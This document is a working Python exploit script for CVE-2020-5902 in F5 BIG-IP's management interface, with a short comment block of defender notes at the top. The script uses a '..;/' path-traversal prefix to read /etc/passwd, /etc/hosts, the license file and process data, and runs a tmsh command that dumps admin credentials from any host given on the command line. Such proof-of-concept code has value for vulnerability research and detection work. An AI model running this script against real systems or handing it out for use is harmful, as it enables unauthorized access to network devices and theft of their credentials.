# Exploit Title: F5 Big-IP 13.1.3 Build 0.0.6 - Local File Inclusion
# Date: 2019-08-17
# Exploit Author: Carlos E. Vieira
# Vendor Homepage: https://www.f5.com/products/big-ip-services
# Version: <= 13.1.3
# Tested on: BIG-IP 13.1.3 Build 0.0.6
# CVE : CVE-2020-5902

#!/usr/bin/env python

# Notes for defenders reading this proof of concept:
# - Every request that reaches a workspace JSP goes through the
#   "/tmui/login.jsp/..;/" prefix. That literal "..;/" sequence under /tmui/
#   in management-interface access logs is the indicator to search for.
# - The script only issues GET/HEAD requests and carries no credentials;
#   the path prefix is what lets it reach fileRead.jsp and tmshCmd.jsp.
# - Remediation is the vendor fix for CVE-2020-5902; until a device is
#   patched, keep the TMUI management interface unreachable from untrusted
#   networks.

import requests
import sys
import time
import urllib3
import json

# Silences the InsecureRequestWarning raised because every call below
# passes verify=False (TLS certificate validation is turned off).
urllib3.disable_warnings()

# No-op at module scope; `target` is actually assigned inside main().
global target


def checkTarget():
    """Return True when a HEAD request to the TMUI login page answers 200."""
    response = requests.head(target + "/tmui/login.jsp", verify=False)
    return response.status_code == 200


def checkVuln():
    """Return True when fileRead.jsp answers 200 with non-empty 'output'.

    The probe asks for /etc/passwd through the "..;" path prefix; a patched
    or filtered device is expected not to return a populated JSON body.
    """
    response = requests.get(
        target
        + "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp"
        + "?fileName=/etc/passwd",
        verify=False,
    )
    if response.status_code != 200:
        return False
    payload = json.loads(response.text)
    return len(payload['output']) > 0


def leakPasswd():
    """Print a banner, pause two seconds, then read /etc/passwd."""
    print("[+] Leaking /etc/passwd from server")
    time.sleep(2)
    exploit('/etc/passwd')


def leakHosts():
    """Print a banner, pause two seconds, then read /etc/hosts."""
    print("[+] Leaking /etc/hosts from server")
    time.sleep(2)
    exploit('/etc/hosts')


def leakLicence():
    """Print a banner, pause two seconds, then read /config/bigip.license."""
    print("[+] Leaking /config/bigip.license from server")
    time.sleep(2)
    exploit('/config/bigip.license')


def leakAdmin():
    """Request tmshCmd.jsp with 'list auth user admin' and print its output.

    Unlike the other helpers this one reaches tmshCmd.jsp rather than
    fileRead.jsp, so the response is the result of a tmsh command.
    """
    print("[+] Leaking admin credentials from server")
    time.sleep(2)
    response = requests.get(
        target
        + "/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp"
        + "?command=list+auth+user+admin",
        verify=False,
    )
    if response.status_code != 200:
        print("[X] Fail to read file")
        return
    payload = json.loads(response.text)
    if len(payload['output']) > 0:
        print(payload['output'])
    else:
        print("[X] Admin credentials not found")


def exploit(file):
    """Fetch `file` through fileRead.jsp and print the 'output' field.

    `file` is appended to the query string as-is (no URL encoding).
    """
    response = requests.get(
        target
        + "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName="
        + file,
        verify=False,
    )
    if response.status_code != 200:
        print("[X] Fail to read file")
        return
    payload = json.loads(response.text)
    print(payload['output'])


def memoryLeak():
    """Read /proc/self/cmdline through fileRead.jsp and print it if present.

    Nothing is printed when the status is not 200 or 'output' is empty.
    """
    print("[!] Leaking tomcat process from server")
    time.sleep(2)
    response = requests.get(
        target
        + "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp"
        + "?fileName=/proc/self/cmdline",
        verify=False,
    )
    if response.status_code == 200:
        payload = json.loads(response.text)
        if len(payload['output']) > 0:
            print("Command: " + payload['output'])


def main(host):
    """Set the global base URL from `host` and run the checks in order.

    The reachability check runs first, then the fileRead.jsp probe; the
    individual read helpers run only when both succeed.
    """
    print("[+] Check target...")
    global target
    target = "https://" + host

    if not checkTarget():
        print("[x] Target is unavailable")
        return
    print("[~] Target is available")

    if not checkVuln():
        print("[X] Target is't vulnerable")
        return
    print("[+] Target is vulnerable!")
    time.sleep(1)
    print("[~] Leak information from target!")
    time.sleep(1)
    for step in (leakPasswd, leakHosts, leakLicence, leakAdmin, memoryLeak):
        step()


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Use: python {} ip/dns".format(sys.argv[0]))
    else:
        host = sys.argv[1]
        main(host)